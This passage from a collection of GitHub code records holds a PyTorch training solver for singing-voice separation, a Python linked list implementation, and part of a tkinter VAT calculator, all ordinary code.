Pos.r_direction[(current_tile[\"X\"] - current_x, current_tile[\"Y\"] - current_y)]\r\n except TypeError:\r\n print(current_tile)\r\n raise\r\n else:\r\n return 0\r\n\r\n","repo_name":"Sanvenir/Sanvenirtin","sub_path":"Sanvenirtin/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37923634830","text":"import time\nimport json\n\nimport torch\nimport torch.nn as nn\nfrom asteroid.losses import (\n PITLossWrapper,\n pairwise_neg_sisdr,\n pairwise_neg_sdsdr,\n PairwiseNegSDR,\n)\nimport matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport torch.distributed as dist\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torch.nn.parallel.distributed import DistributedDataParallel as DDP\nimport wandb\nfrom ema_pytorch import EMA\n\nfrom . 
import utils\nfrom .models import load_model_with_args\nfrom .losses import (\n SingleSrcMultiScaleSpectral_modified,\n SingleSrcMultiScaleSpectral_TRUnet,\n SingleSrcMultiScaleSpectral_TRUNet_freq,\n SingleSrcMultiScaleSpectral_L1,\n SingleSrcMultiScaleSpectral_L1_above_freq,\n)\nfrom .data import (\n DuetSingingSpeechMixTraining,\n DuetSingingSpeechMixValidation,\n MultiSingingSpeechMixTraining,\n MultiSingingSpeechMixValidation,\n)\n\n\nclass Solver(object):\n def __init__(self):\n pass\n\n def set_gpu(self, args):\n if args.use_wandb and args.gpu == 0:\n if args.sweep:\n wandb.init(\n entity=args.entity,\n project=args.project,\n config=args,\n resume=True if args.resume != None and args.gpu == 0 else False,\n )\n else:\n wandb.init(\n entity=args.entity,\n project=args.project,\n name=f\"{args.exp_name}_{args.gpu}\",\n group=\"singing_sep\",\n config=args,\n resume=False,\n settings=wandb.Settings(start_method=\"fork\"),\n )\n\n ###################### Define Models ######################\n trainable_params = []\n # load model\n self.model = load_model_with_args(args)\n if args.mixture_consistency == \"sfsrnet\":\n total_params = list(self.model.masker.parameters())\n sr_net_params = list(self.model.sr_net.parameters())\n trainable_params = [\n {\"params\": sr_net_params, \"lr\": args.lr},\n {\"params\": total_params, \"lr\": args.lr},\n ]\n else:\n trainable_params = trainable_params + list(self.model.parameters())\n\n if args.optimizer == \"sgd\":\n self.optimizer = torch.optim.SGD(\n params=trainable_params,\n lr=args.lr,\n momentum=0.9,\n eps=args.eps,\n weight_decay=args.weight_decay,\n )\n elif args.optimizer == \"adamw\":\n self.optimizer = torch.optim.AdamW(\n params=trainable_params,\n lr=args.lr,\n betas=(args.beta1, args.beta2),\n eps=args.eps,\n amsgrad=False,\n weight_decay=args.weight_decay,\n )\n elif args.optimizer == \"radam\":\n self.optimizer = torch.optim.RAdam(\n params=trainable_params,\n lr=args.lr,\n betas=(args.beta1, args.beta2),\n eps=args.eps,\n weight_decay=args.weight_decay,\n )\n elif args.optimizer == \"adam\":\n self.optimizer = torch.optim.Adam(\n params=trainable_params,\n lr=args.lr,\n betas=(args.beta1, args.beta2),\n eps=args.eps,\n weight_decay=args.weight_decay,\n )\n else:\n print(\"no optimizer loaded\")\n raise NotImplementedError\n\n if args.lr_scheduler == \"step_lr\":\n self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n self.optimizer,\n mode=\"min\",\n factor=args.lr_decay_gamma,\n patience=args.lr_decay_patience,\n cooldown=0,\n min_lr=5e-5,\n verbose=True,\n )\n elif args.lr_scheduler == \"cos_warmup\":\n self.scheduler = utils.CosineAnnealingWarmUpRestarts(\n self.optimizer, T_0=40, T_mult=1, eta_max=args.lr, T_up=10, gamma=0.5\n )\n\n torch.cuda.set_device(args.gpu)\n\n self.model = self.model.to(f\"cuda:{args.gpu}\")\n\n ############################################################\n # Define Loss\n self.criterion = {}\n self.criterion[\"L1\"] = nn.L1Loss().to(args.gpu)\n self.criterion[\"si_sdr\"] = pairwise_neg_sisdr.to(args.gpu)\n self.criterion[\"snr\"] = PairwiseNegSDR(\"snr\", EPS=args.eps).to(args.gpu)\n self.criterion[\"mse\"] = nn.MSELoss().to(args.gpu)\n self.criterion[\"bce\"] = nn.BCEWithLogitsLoss().to(args.gpu)\n\n if args.mixed_precision:\n pairwise_neg_sisdr_ = PairwiseNegSDR(\"sisdr\", EPS=args.eps)\n self.criterion[\"pit_si_sdr\"] = PITLossWrapper(\n pairwise_neg_sisdr_, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n self.criterion[\"pit_sd_sdr\"] = PITLossWrapper(\n pairwise_neg_sisdr_, pit_from=\"pw_mtx\"\n 
).to(args.gpu)\n\n pairwise_neg_snr_ = PairwiseNegSDR(\"snr\", EPS=args.eps)\n self.criterion[\"pit_snr\"] = PITLossWrapper(\n pairwise_neg_snr_, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n\n else:\n self.criterion[\"pit_si_sdr\"] = PITLossWrapper(\n pairwise_neg_sisdr, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n self.criterion[\"pit_sd_sdr\"] = PITLossWrapper(\n pairwise_neg_sdsdr, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n\n pairwise_neg_snr_ = PairwiseNegSDR(\"snr\")\n self.criterion[\"pit_snr\"] = PITLossWrapper(\n pairwise_neg_snr_, pit_from=\"pw_mtx\"\n ).to(args.gpu)\n\n # Spectral loss\n self.criterion[\"multi_spectral_l1\"] = SingleSrcMultiScaleSpectral_L1(\n loss_scale=100.0,\n log_scale=args.multi_spec_loss_log_scale,\n ).to(args.gpu)\n self.criterion[\n \"multi_spectral_l1_above_freq\"\n ] = SingleSrcMultiScaleSpectral_L1_above_freq(\n loss_scale=100.0,\n sample_rate=args.sample_rate,\n above_freq=args.above_freq,\n log_scale=args.multi_spec_loss_log_scale,\n ).to(\n args.gpu\n )\n\n self.criterion[\"pit_multi_spectral_l1\"] = PITLossWrapper(\n self.criterion[\"multi_spectral_l1\"], pit_from=\"pw_pt\"\n ).to(args.gpu)\n self.criterion[\"multi_spectral\"] = SingleSrcMultiScaleSpectral_modified().to(\n args.gpu\n )\n self.criterion[\"multi_spectral_trunet\"] = SingleSrcMultiScaleSpectral_TRUnet(\n loss_scale=0.01,\n log_scale=args.multi_spec_loss_log_scale,\n ).to(args.gpu)\n self.criterion[\n \"multi_spectral_trunet_above_freq\"\n ] = SingleSrcMultiScaleSpectral_TRUNet_freq(\n loss_scale=0.01,\n sample_rate=args.sample_rate,\n above_freq=args.above_freq,\n log_scale=args.multi_spec_loss_log_scale,\n ).to(\n args.gpu\n )\n\n self.es = utils.EarlyStopping(patience=args.patience)\n self.stop = False\n\n if args.use_wandb and args.gpu == 0:\n wandb.watch(self.model, log=\"all\")\n\n self.start_epoch = 1\n self.train_losses = []\n self.valid_losses = []\n self.train_times = []\n self.best_epoch = 0\n\n if args.resume and not args.ema:\n self.resume(args)\n\n # Distribute models to machine\n self.model = DDP(\n self.model,\n device_ids=[args.gpu],\n output_device=args.gpu,\n find_unused_parameters=True,\n )\n\n if args.ema:\n self.model_ema = EMA(\n self.model,\n beta=0.999,\n update_after_step=100,\n update_every=10,\n )\n\n if args.resume and args.ema:\n self.resume(args)\n\n ###################### Define data pipeline ######################\n args.batch_size = int(args.batch_size / args.ngpus_per_node)\n self.mp_context = torch.multiprocessing.get_context(\"fork\")\n if args.dataset == \"singing_librispeech\":\n self.train_dataset = DuetSingingSpeechMixTraining(\n singing_data_dir=args.train_root,\n speech_data_dir=args.speech_train_root,\n song_length_dict_path=args.song_length_dict_path,\n same_song_dict_path=args.same_song_dict_path,\n same_singer_dict_path=args.same_singer_dict_path,\n same_speaker_dict_path=args.same_speaker_dict_path,\n sample_rate=args.sample_rate,\n segment=args.seq_dur,\n unison_prob=args.unison_prob,\n pitch_formant_augment_prob=args.pitch_formant_augment_prob,\n augment=True,\n part_of_data=args.part_of_data,\n reduced_training_data_ratio=args.reduced_training_data_ratio,\n sing_sing_ratio=args.sing_sing_ratio,\n sing_speech_ratio=args.sing_speech_ratio,\n same_song_ratio=args.same_song_ratio,\n same_singer_ratio=args.same_singer_ratio,\n same_speaker_ratio=args.same_speaker_ratio,\n # speech_speech_ratio=args.speech_speech_ratio\n )\n self.valid_dataset = []\n for valid_data_path_list in args.valid_root:\n self.valid_dataset.append(\n 
DuetSingingSpeechMixValidation(\n data_dir=[valid_data_path_list],\n sample_rate=args.sample_rate,\n segment=args.seq_dur,\n augment=True,\n )\n )\n elif args.dataset == \"multi_singing_librispeech\":\n self.train_dataset = MultiSingingSpeechMixTraining(\n singing_data_dir=args.train_root,\n speech_data_dir=args.speech_train_root,\n song_length_dict_path=args.song_length_dict_path,\n same_song_dict_path=args.same_song_dict_path,\n same_singer_dict_path=args.same_singer_dict_path,\n same_speaker_dict_path=args.same_speaker_dict_path,\n min_n_src=args.min_n_src,\n max_n_src=args.max_n_src,\n sample_rate=args.sample_rate,\n segment=args.seq_dur,\n unison_prob=args.unison_prob,\n pitch_formant_augment_prob=args.pitch_formant_augment_prob,\n augment=True,\n part_of_data=args.part_of_data,\n reduced_training_data_ratio=args.reduced_training_data_ratio,\n sing_sing_ratio=args.sing_sing_ratio,\n sing_speech_ratio=args.sing_speech_ratio,\n same_song_ratio=args.same_song_ratio,\n same_singer_ratio=args.same_singer_ratio,\n same_speaker_ratio=args.same_speaker_ratio,\n # speech_speech_ratio=args.speech_speech_ratio\n )\n self.valid_dataset = []\n for valid_data_path_list in args.valid_root_orpit:\n self.valid_dataset.append(\n MultiSingingSpeechMixValidation(\n data_dir=[valid_data_path_list],\n sample_rate=args.sample_rate,\n segment=args.seq_dur,\n augment=True,\n )\n )\n\n self.train_sampler = DistributedSampler(\n self.train_dataset, shuffle=True, rank=args.gpu\n )\n self.train_loader = torch.utils.data.DataLoader(\n self.train_dataset,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.nb_workers,\n multiprocessing_context=self.mp_context,\n pin_memory=True,\n sampler=self.train_sampler,\n drop_last=False,\n worker_init_fn=utils.worker_init_fn,\n persistent_workers=True,\n )\n self.valid_sampler = []\n self.valid_loader = []\n for i, valid_dataset_ in enumerate(self.valid_dataset):\n self.valid_sampler.append(\n DistributedSampler(valid_dataset_, shuffle=False, rank=args.gpu)\n )\n self.valid_loader.append(\n torch.utils.data.DataLoader(\n valid_dataset_,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.nb_workers,\n multiprocessing_context=self.mp_context,\n pin_memory=False,\n sampler=self.valid_sampler[i],\n drop_last=False,\n )\n )\n\n if args.mixed_precision:\n self.scaler = torch.cuda.amp.GradScaler()\n\n def train(self, args, epoch):\n self.end = time.time()\n self.model.train()\n self.train_sampler.set_epoch(epoch)\n\n # get current learning rate\n for param_group in self.optimizer.param_groups:\n current_lr = param_group[\"lr\"]\n\n if (\n args.rank % args.ngpus_per_node == 0\n ): # when the last rank process is finished\n print(f\"Epoch {epoch}, Learning rate: {current_lr}\")\n\n losses = utils.AverageMeter()\n loss_logger = {}\n\n loss_logger[\"epoch-wise-train/train loss\"] = 0\n # with torch.autograd.detect_anomaly(): # use this if you want to detect anomaly behavior while training.\n for i, values in enumerate(self.train_loader):\n mixture, clean = values\n\n mixture = mixture.cuda(args.gpu, non_blocking=True)\n clean = clean.cuda(args.gpu, non_blocking=True)\n\n target = clean\n\n if args.mixed_precision:\n with torch.cuda.amp.autocast():\n if args.mixture_consistency == \"sfsrnet\":\n estimates = self.model.module.forward_pre(mixture)\n else:\n estimates = self.model(mixture)\n else:\n if args.mixture_consistency == \"sfsrnet\":\n estimates = self.model.module.forward_pre(mixture)\n else:\n estimates = self.model(mixture)\n\n loss_input = {}\n\n if 
(\n                len(args.train_loss_func) == 1\n            ): # train_loss_function only uses pit_si_sdr (or pit_other) loss\n                loss_input[args.train_loss_func[0]] = (estimates, target)\n\n                loss_dict = self.cal_loss(args, loss_input)\n                loss = sum([value.mean() for key, value in loss_dict.items()])\n\n            else: # train_loss_function uses other losses\n                loss = []\n                for train_loss_idx, single_train_loss_func in enumerate(\n                    args.train_loss_func\n                ):\n                    # first single_train_loss_func should be 'pit_si_sdr', 'pit_sd_sdr', 'pit_snr' or 'pit_multi_spectral_l1'\n                    if single_train_loss_func in (\n                        \"pit_si_sdr\",\n                        \"pit_sd_sdr\",\n                        \"pit_snr\",\n                        \"pit_multi_spectral_l1\",\n                    ):\n                        loss_pit, estimates = self.criterion[\n                            single_train_loss_func\n                        ].forward(estimates, target, return_est=True)\n                        loss.append(loss_pit.mean())\n                    else:\n                        if (\n                            args.mixture_consistency == \"sfsrnet\"\n                            and len(args.train_loss_func) == 2\n                        ):\n                            estimates = self.model.module.forward_sr(\n                                mixture, estimates\n                            ) # for example, when using --train_loss_func pit_si_sdr si_sdr\n                        elif (\n                            args.mixture_consistency == \"sfsrnet\"\n                            and len(args.train_loss_func) >= 3\n                        ): # --train_loss_func pit_snr multi_spectral_l1 snr multi_spectral_l1\n                            if train_loss_idx == 2:\n                                estimates = self.model.module.forward_sr(\n                                    mixture, estimates\n                                ) # for example\n                            else:\n                                pass\n                        loss_else = self.criterion[single_train_loss_func](\n                            estimates, target\n                        )\n                        loss.append(loss_else.mean())\n                loss = sum(loss)\n            ############################################################\n\n            #################### 5. Back propagation ####################\n            if args.mixed_precision:\n                self.scaler.scale(loss).backward()\n                if args.gradient_clip:\n                    self.scaler.unscale_(self.optimizer)\n                    nn.utils.clip_grad_norm_(\n                        self.model.parameters(), max_norm=args.gradient_clip\n                    )\n                self.scaler.step(self.optimizer)\n                self.scaler.update()\n            else:\n                loss.backward()\n                if args.gradient_clip:\n                    nn.utils.clip_grad_norm_(\n                        self.model.parameters(), max_norm=args.gradient_clip\n                    )\n                self.optimizer.step()\n\n            losses.update(loss.item(), clean.size(0))\n\n            loss_logger[\"epoch-wise-train/train loss\"] = loss.item()\n\n            self.model.zero_grad()\n\n            if args.ema:\n                self.model_ema.update()\n            ############################################################\n\n            # ###################### 6. 
Plot ######################\n            if i % 30 == 0:\n                # loss print for multiple loss function\n                multiple_score = torch.Tensor(\n                    [value for key, value in loss_logger.items()]\n                ).to(args.gpu)\n                gathered_score_list = [\n                    torch.ones_like(multiple_score)\n                    for _ in range(dist.get_world_size())\n                ]\n                dist.all_gather(gathered_score_list, multiple_score)\n                gathered_score = torch.mean(\n                    torch.stack(gathered_score_list, dim=0), dim=0\n                )\n                if args.gpu == 0:\n                    print(f\"Epoch {epoch}, step {i} / {len(self.train_loader)}\")\n                    temp_loss_logger = {}\n                    for index, (key, value) in enumerate(loss_logger.items()):\n                        temp_key = key.replace(\"epoch-wise-train/\", \"iter-wise/\")\n                        temp_loss_logger[temp_key] = round(\n                            gathered_score[index].item(), 6\n                        )\n                        print(f\"{key} : {round(gathered_score[index].item(), 6)}\")\n\n        single_score = torch.Tensor([losses.avg]).to(args.gpu)\n        loss_logger[\"epoch-wise-train/train loss\"] = single_score\n\n        if args.use_wandb and args.gpu == 0:\n            loss_logger[\"epoch-wise-train/epoch\"] = epoch\n            wandb.log(loss_logger)\n\n        gathered_score_list = [\n            torch.ones_like(single_score) for _ in range(dist.get_world_size())\n        ]\n        dist.all_gather(gathered_score_list, single_score)\n        gathered_score = torch.mean(torch.cat(gathered_score_list)).item()\n        if args.gpu == 0:\n            self.train_losses.append(gathered_score)\n\n    def multi_validate(self, args, epoch):\n        if args.gpu == 0:\n            print(f\"Epoch {epoch} Validation session!\")\n\n        losses = utils.AverageMeter()\n\n        loss_logger = {}\n\n        self.model.eval()\n        with torch.no_grad():\n            valid_loss_accumulated = 0\n            for valid_loader_idx, valid_loader in enumerate(self.valid_loader):\n                if args.dataset == \"multi_singing_librispeech\":\n                    valid_loader_category = args.valid_root_orpit[valid_loader_idx][3]\n                else:\n                    valid_loader_category = args.valid_root[valid_loader_idx][3]\n                for i, values in enumerate(valid_loader, start=1):\n\n                    mixture, clean = values\n\n                    mixture = mixture.cuda(args.gpu, non_blocking=True)\n                    clean = clean.cuda(args.gpu, non_blocking=True)\n\n                    target = clean\n\n                    loss_input = {}\n\n                    if args.mixed_precision:\n                        with torch.cuda.amp.autocast():\n                            if args.ema:\n                                estimates = self.model_ema(mixture)\n                            else:\n                                estimates = self.model(mixture)\n                    else:\n                        if args.ema:\n                            estimates = self.model_ema(mixture)\n                        else:\n                            estimates = self.model(mixture)\n\n                    if (\n                        args.architecture == \"conv_tasnet_stft\"\n                        or args.architecture == \"conv_tasnet_learnable_basis\"\n                    ):\n                        if len(args.valid_loss_func) == 1:\n                            loss_input[args.valid_loss_func[0]] = (estimates, target)\n\n                            loss_dict = self.cal_loss(\n                                args, loss_input\n                            ) # compute each loss and store the results in a dict\n                            loss = sum(\n                                [value.mean() for key, value in loss_dict.items()]\n                            )\n                        else:\n                            loss = []\n                            for single_valid_loss_func in args.valid_loss_func:\n                                if single_valid_loss_func in (\n                                    \"pit_si_sdr\", \"pit_sd_sdr\"\n                                ):\n                                    loss_pit, estimates = self.criterion[\n                                        single_valid_loss_func\n                                    ].forward(estimates, target, return_est=True)\n                                    loss.append(loss_pit)\n                                else:\n                                    loss_else = self.criterion[single_valid_loss_func](\n                                        estimates, target\n                                    )\n                                    loss.append(loss_else)\n                            loss = sum(loss)\n                        losses.update(loss.item(), clean.size(0))\n                    else:\n                        if len(args.valid_loss_func) == 1:\n\n                            loss_input[args.valid_loss_func[0]] = (estimates, target)\n\n                            loss_dict = self.cal_loss(\n                                args, loss_input\n                            ) # compute each loss and store the results in a dict\n                            loss = sum([value for key, value in loss_dict.items()])\n                        else:\n                            loss = []\n                            for single_valid_loss_func in args.valid_loss_func:\n                                if single_valid_loss_func in (\n                                    \"pit_si_sdr\", \"pit_sd_sdr\"\n                                ):\n                                    loss_pit, estimates = self.criterion[\n                                        single_valid_loss_func\n                                    ].forward(estimates, target, return_est=True)\n                                    loss.append(loss_pit)\n                                else:\n                                    loss_else = self.criterion[single_valid_loss_func](\n                                        estimates, target\n                                    )\n                                    loss.append(loss_else)\n                            loss = sum(loss)\n                        losses.update(loss.item(), clean.size(0))\n\n                single_score = torch.Tensor([losses.avg]).to(args.gpu)\n                gathered_score_list = [\n                    torch.ones_like(single_score) for _ in range(dist.get_world_size())\n                ]\n                dist.all_gather(gathered_score_list, single_score)\n                gathered_score = torch.mean(torch.cat(gathered_score_list)).item()\n\n                loss_logger[\n                    f\"epoch-wise-valid/{valid_loader_category} valid loss\"\n                ] = gathered_score\n\n                valid_loss_accumulated = valid_loss_accumulated + gathered_score\n\n                if args.use_wandb and args.gpu == 0:\n                    loss_logger[\"epoch-wise-valid/epoch\"] = epoch\n                    wandb.log(loss_logger)\n\n        valid_loss_accumulated = valid_loss_accumulated / len(self.valid_loader)\n\n        if args.lr_scheduler == \"step_lr\":\n            self.scheduler.step(valid_loss_accumulated)\n        elif args.lr_scheduler == \"cos_warmup\":\n            self.scheduler.step(epoch)\n        else:\n            self.scheduler.step(valid_loss_accumulated)\n\n        if args.gpu == 0:\n            self.valid_losses.append(valid_loss_accumulated)\n\n            self.stop = self.es.step(valid_loss_accumulated)\n\n            print(\n                f\"Epoch {epoch}, validation loss : {round(valid_loss_accumulated, 6)}\"\n            )\n\n            plt.plot(self.train_losses, label=\"train loss\")\n            plt.plot(self.valid_losses, label=\"valid loss\")\n            plt.legend(loc=\"upper right\")\n            plt.savefig(f\"{args.output}/loss_graph_{args.target}.png\")\n            plt.close()\n\n            save_states = {\n                \"epoch\": epoch,\n                \"state_dict\": self.model.module.state_dict()\n                if not args.ema\n                else self.model_ema.state_dict(),\n                \"best_loss\": self.es.best,\n                \"optimizer\": self.optimizer.state_dict(),\n                \"scheduler\": self.scheduler.state_dict(),\n            }\n\n            utils.save_checkpoint(\n                save_states,\n                state_dict_only=valid_loss_accumulated == self.es.best,\n                path=args.output,\n                target=args.target,\n            )\n\n            # pass for now\n            if valid_loss_accumulated == self.es.best:\n                self.best_epoch = epoch\n\n            # save params\n            params = {\n                \"epochs_trained\": epoch,\n                \"args\": vars(args),\n                \"best_loss\": self.es.best,\n                \"best_epoch\": self.best_epoch,\n                \"train_loss_history\": self.train_losses,\n                \"valid_loss_history\": self.valid_losses,\n                \"train_time_history\": self.train_times,\n                \"num_bad_epochs\": self.es.num_bad_epochs,\n            }\n\n            with open(f\"{args.output}/{args.target}.json\", \"w\") as outfile:\n                outfile.write(json.dumps(params, indent=4, sort_keys=True))\n\n            self.train_times.append(time.time() - self.end)\n            print(\n                f\"Epoch {epoch} train completed. 
Took {round(self.train_times[-1], 3)} seconds\"\n )\n\n def resume(self, args):\n print(f\"Resume checkpoint from: {args.resume}:\")\n loc = f\"cuda:{args.gpu}\"\n checkpoint_path = f\"{args.resume}/{args.target}\"\n with open(f\"{checkpoint_path}.json\", \"r\") as stream:\n results = json.load(stream)\n checkpoint = torch.load(f\"{checkpoint_path}.chkpnt\", map_location=loc)\n if args.start_from_best:\n del checkpoint[\"state_dict\"]\n checkpoint[\"state_dict\"] = torch.load(\n f\"{checkpoint_path}.pth\", map_location=loc\n )\n print(\"start from best weight\")\n if args.ema:\n if args.mixture_consistency == \"sfsrnet\":\n model_dict = self.model_ema.state_dict()\n # 1. filter out unnecessary keys\n checkpoint[\"state_dict\"] = {\n k: v for k, v in checkpoint[\"state_dict\"].items() if k in model_dict\n }\n # 2. overwrite entries in the existing state dict\n model_dict.update(checkpoint[\"state_dict\"])\n # 3. load the new state dict\n self.model_ema.load_state_dict(checkpoint[\"state_dict\"], strict=False)\n else:\n self.model_ema.load_state_dict(checkpoint[\"state_dict\"])\n self.optimizer.load_state_dict(checkpoint[\"optimizer\"])\n else:\n if args.load_ema_online_model:\n print(\"load ema online model!!\")\n model_dict = self.model.state_dict()\n # 1. filter out unnecessary keys\n checkpoint[\"state_dict\"] = {\n k.replace(\"online_model.module.\", \"\"): v\n for k, v in checkpoint[\"state_dict\"].items()\n if k.replace(\"online_model.module.\", \"\") in model_dict\n }\n # 2. overwrite entries in the existing state dict\n model_dict.update(checkpoint[\"state_dict\"])\n # 3. load the new state dict\n self.model.load_state_dict(checkpoint[\"state_dict\"])\n else:\n self.model.load_state_dict(checkpoint[\"state_dict\"])\n\n self.optimizer.load_state_dict(checkpoint[\"optimizer\"])\n if (\n args.continual_train\n ): # we want to use pre-trained model but not want to use lr_scheduler history.\n for param_group in self.optimizer.param_groups:\n param_group[\"lr\"] = args.lr\n else:\n self.scheduler.load_state_dict(checkpoint[\"scheduler\"])\n self.es.best = results[\"best_loss\"]\n self.es.num_bad_epochs = results[\"num_bad_epochs\"]\n\n self.start_epoch = results[\"epochs_trained\"] + 1\n self.train_losses = results[\"train_loss_history\"]\n self.valid_losses = results[\"valid_loss_history\"]\n self.train_times = results[\"train_time_history\"]\n self.best_epoch = results[\"best_epoch\"]\n\n if args.rank % args.ngpus_per_node == 0:\n print(\n f\"=> loaded checkpoint {checkpoint_path} (epoch {results['epochs_trained']})\"\n )\n\n def cal_loss(self, args, loss_input):\n loss_dict = {}\n for key, value in loss_input.items():\n loss_dict[key] = self.criterion[key](*value)\n\n return loss_dict\n","repo_name":"jeonchangbin49/MedleyVox","sub_path":"svs/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":31099,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"} +{"seq_id":"38686330523","text":"class node:\n def __init__(self,item):\n self.item=item\n self.next=None\n \nclass linkedlist:\n def __init__(self):\n self.head=None\n \n def insertatbegining(self,new_item):\n new_node=node(new_item)\n new_node.next=self.head\n self.head=new_node\n \n def insertatend(self,new_item):\n new_node=node(new_item)\n if self.head is None:\n self.head=new_node\n return\n last=self.head\n while(last.next is not None):\n last=last.next\n last.next=new_node\n \n \n def insertatposition(self,prev_node,new_item):\n if prev_node is None:\n print(\"the 
given previous node must be in the linked list\")\n            return\n        new_node=node(new_item)\n        new_node.next=prev_node.next\n        prev_node.next=new_node\n    \n    \n    def deletenode(self,position):\n        if self.head is None:\n            return\n        temp=self.head\n        if position == 0:\n            self.head=temp.next\n            temp=None\n            return\n        for i in range(position-1):\n            temp=temp.next\n            if temp is None:\n                break\n        if temp is None:\n            return\n        if temp.next is None:\n            return\n        next=temp.next.next\n        temp.next=None\n        temp.next=next\n    \n    \n    def search(self,key):\n        current=self.head\n        while current is not None:\n            if current.item==key:\n                return True\n            current=current.next\n        return False\n    \n    \n    def sortlinkedlist(self,head):\n        current=head\n        index=node(None)\n        if head is None:\n            return\n        else:\n            while current is not None:\n                index=current.next\n                while index is not None:\n                    if current.item>index.item:\n                        current.item,index.item=index.item,current.item\n                    index=index.next\n                current=current.next\n    \n    \n    def printlist(self):\n        temp=self.head\n        while(temp):\n            print(str(temp.item),end=\" \")\n            temp=temp.next\n    \nif __name__== '__main__':\n    linked_list=linkedlist()\n    linked_list.head=node(1)\n    second=node(2)\n    third=node(3)\n    linked_list.head.next=second\n    second.next=third\n    linked_list.printlist()\n    print()\n    linked_list.insertatbegining(4)\n    linked_list.printlist()\n    print()\n    linked_list.insertatend(5)\n    linked_list.printlist()\n    print()\n    linked_list.insertatposition(linked_list.head.next,6)\n    linked_list.printlist()\n    print()\n    linked_list.deletenode(3)\n    linked_list.printlist()\n    print()\n    item_to_find=3\n    if linked_list.search(item_to_find):\n        print(str(item_to_find)+\" is found\")\n    else:\n        print(str(item_to_find)+\" is not found\")\n    print()\n    linked_list.sortlinkedlist(linked_list.head)\n    print(\"sorted list:\")\n    linked_list.printlist()\n","repo_name":"Sirivarshini5B5/CP-journey","sub_path":"Data structures/single_linked _list.py","file_name":"single_linked _list.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"22132898873","text":"import tkinter as tk\r\nfrom ttkbootstrap.constants import *\r\nimport ttkbootstrap as tb\r\n\r\ndef main(): \r\n    \r\n    sum_label = tb.Label(text=\"Sum\", font=('Helvetica', 20), bootstyle=\"default\")\r\n    vat_label = tb.Label(text=\"VAT in %\", font=(\"Helvetica\", 20), bootstyle=\"default\")\r\n    \r\n    sum_label.grid(row=3, column=0, pady=55)\r\n    vat_label.grid(row=4, column=0, pady=0)\r\n    \r\n    sum_entry.grid(row=3, column=1, sticky=\"ew\")\r\n    vat_entry.grid(row=4, column=1, sticky=\"ew\")\r\n    \r\n    top_label = tb.Label(text=\"Calculate VAT\", font=(\"Helvetica\", 20), bootstyle=\"warning\")\r\n    left_label = tb.Label(text=\"Inclusive/Exclusive\", font=(\"Helvetica\", 20), bootstyle=\"warning\")\r\n    \r\n    top_label.grid(row=1, column=1, pady=25)\r\n    left_label.grid(row=2, column=1)\r\n    \r\n    the_sum_includes = tb.Label(text=\"Action:\", font=(\"Helvetica\", 20), bootstyle=\"default\")\r\n    \r\n    include_vat_style = tb.Style()\r\n    include_vat_style.configure(\"success.TCheckbutton\", font=(\"Helvetica\", 16))\r\n    includes_vat = tb.Checkbutton(bootstyle=\"success, round-toggle\", \r\n                                  text=\"Exclude VAT\", \r\n                                  variable=var_include_vat, \r\n                                  onvalue=1, \r\n                                  offvalue=0,\r\n                                  style=\"success.TCheckbutton\")\r\n    \r\n    \r\n    vat_not_included_style = tb.Style()\r\n    vat_not_included_style.configure(\"success.TCheckbutton\", font=(\"Helvetica\", 16))\r\n    vat_not_included = tb.Checkbutton(bootstyle=\"success, round-toggle\", \r\n                                      text='Add VAT',\r\n                                      variable=var_not_include_vat,\r\n                                      onvalue=1,\r\n                                      offvalue=0,\r\n                                      
style=\"success.TCheckbutton\"\r\n                                      )\r\n    \r\n    #Position on the work screen\r\n    the_sum_includes.grid(row=5, column=0, pady=50)\r\n    includes_vat.grid(row=5, column=1)\r\n    vat_not_included.grid(row=5, column=2)\r\n    \r\n    \r\n    #Style buttons\r\n    calculate_style = tb.Style()\r\n    calculate_style.configure('info.TButton', font=('Helvetica', 18))\r\n    \r\n    clear_style = tb.Style()\r\n    clear_style.configure(\"danger.TButton\", font=(\"Helvetica\", 18))\r\n    \r\n    \r\n    calculate_button = tb.Button(text=\"Calculate\", bootstyle=\"info\", style=\"info.TButton\", command=check_operation)\r\n    other_action = tb.Label(text=\"OR\", font=(\"Helvetica\", 20), bootstyle=\"default\")\r\n    clear_button = tb.Button(text=\"Clear\", bootstyle=\"danger\", style=\"danger.TButton\", command=clear_entrys)\r\n    \r\n    calculate_button.grid(row=6, column=0)\r\n    other_action.grid(row=6, column=1)\r\n    clear_button.grid(row=6, column=2)\r\n    \r\n    window.mainloop()\r\n\r\ndef clear_entrys():\r\n    sum_entry.delete(0, 'end')\r\n    vat_entry.delete(0, 'end')\r\n\r\ndef no_str_input():\r\n    clear_entrys()\r\n    \r\n    warn_input = tb.Label(text=\"Use only numbers!\", font=(\"Helvetica\", 18), bootstyle=\"danger\")\r\n    warn_input.grid(row=7, column=1, pady=50)\r\n    \r\ndef calculate_vat_included(s_value, v_value):\r\n    s_value = int(s_value)\r\n    v_value = int(v_value)\r\n    \r\n    sum_without_vat = round((s_value / (v_value + 100) * 100), 2)\r\n    vat = round(s_value - sum_without_vat, 2)\r\n    \r\n    return [sum_without_vat, vat]\r\n    \r\ndef calculate_vat_excluded(s_value, v_value):\r\n    s_value = int(s_value)\r\n    v_value = int(v_value)\r\n    \r\n    sum_with_vat = round((s_value / 100) * (v_value + 100), 2 )\r\n    vat = round(sum_with_vat - s_value, 2)\r\n    \r\n    return [sum_with_vat, vat]\r\n\r\ndef check_operation():\r\n    \r\n    try:\r\n        sum_entry_value = int(sum_entry.get())\r\n        vat_entry_value = int(vat_entry.get())\r\n    except ValueError:\r\n        no_str_input()\r\n        return\r\n    \r\n    \r\n    if var_include_vat.get() == 1:\r\n        exclude_vat = calculate_vat_included(sum_entry_value, 